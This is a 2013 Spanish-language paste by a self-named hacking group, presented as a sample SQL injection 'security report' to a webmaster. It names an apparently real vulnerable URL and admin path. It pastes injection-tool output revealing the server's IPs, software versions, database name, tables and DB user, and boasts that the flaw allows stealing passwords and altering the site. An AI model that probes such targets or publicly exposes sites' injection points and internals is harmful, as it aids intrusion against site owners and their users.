Ejemplo de Reporte de seguridad #REPORT #2013 /Yei Zeta Post

1. ###########################################################################################
2. # : : o : #
3. # _..-: 0 : :-.._ / #title:Ejemplo de Reporte de seguridad #REPORT #2013 /Yei Zeta Post/
4. # .-'' ' `---' `---' " ``-. #*The Ciber War In 2013
5. # .' " ' " . " . ' " `. #*Informaticos
6. # : '.---.,,.,...,.,.,.,..---. ' ; #*2013-2018
7. # `. " `. .' " .' #*Grupo: The Joker Hack
8. # `. '`. .-/|||||||\-. .' ' .' #*Red Social:https://www.facebook.com/TheJokerTeamHack
9. # `. `-._ \|||/ _.-' " .' #
10. # `. " '"--...--"' . ' .' #Created by: Yei zeta
11. # .'`-._' " . " _.-'`. #
12. # .' ```--.....--''' ' `: #Info: the joker hack se hace responsable de la información.
13. ##################################################################################################
14. Info:Muchos reportes se Asen con "Word" pero eso es solo con empresas grandes
15. ##################################################################################################
16.  
17. Ejemplo sencillo:
18.  
19. _Saludos sr.Webmaster requiero de su atencion para reportar la siguiente falla de seguridad e encontrado una falla conocida como (SQL INJECTION) ¿Que podria aser con SQL INJECTION? La SQL Injection me podria beneficiar en romper la base de datos y extraer sus contraseñas para acceder a su sitio web y modificar el contenido aca un ejemplo:
20.  
21.  
22.  
23. http://www.djnev.com/Generarenlace.php?id= -> Falla Se Encuentra (ACA)
24.  
25. y este fue mi resultado:
26.  
27. Host IP: 87.106.193.77
28. Web Server: Apache
29. Powered-by: PHP/5.2.17
30. Keyword Found: mysql_fetch_array():
31. I guess injection type is Integer?! If injection failed, retry with a manual keyword.
32. DB Server: MySQL
33. Selected Column Count is 20
34. Valid String Column is 1
35. Current DB: db424358332
36. Count(table_name) of information_schema.tables where table_schema=0x6462343234333538333332 is 11
37. Tables found: biografia,clientes,conectados,contador,control_ip,descargas,eventos,poblaciones,provincias,youtube,youtube2
38.  
39.  
40.  
41. (http://djnev.com/admin) 23.20.118.189
42.  
43. Installation dir: /usr/local/mysql-5.1.71-linux-i686-glibc23/
44. DB User: 'dbo424358332'@'%'
45. Data Bases: information_schema
46. db424358332
47.  
48. SCHEMA:CHARACTER_SETS,COLLATIONS,COLLATION_CHARACTER_SET_APPLICABILITY,COLUMNS,COLUMN_PRIVILEGES,ENGINES,EVENTS,FILES,GLOBAL_STATUS,GLOBAL_VARIABLES,KEY_COLUMN_USAGE,PARTITIONS,PLUGINS,PROCESSLIST,PROFILING,REFERENTIAL_CONSTRAINTS,ROUTINES,SCHEMATA,SCHEMA_PRIVILEGES,SESSION_STATUS,SESSION_VARIABLES,STATISTICS,TABLES,TABLE_CONSTRAINTS,TABLE_PRIVILEGES,TRIGGERS,USER_PRIVILEGES,VIEWS
49.  
50.  
51. (EL USUARIO SERA RESERVADO NUNCA EXPUESTO A NUESTRO CLIENTE)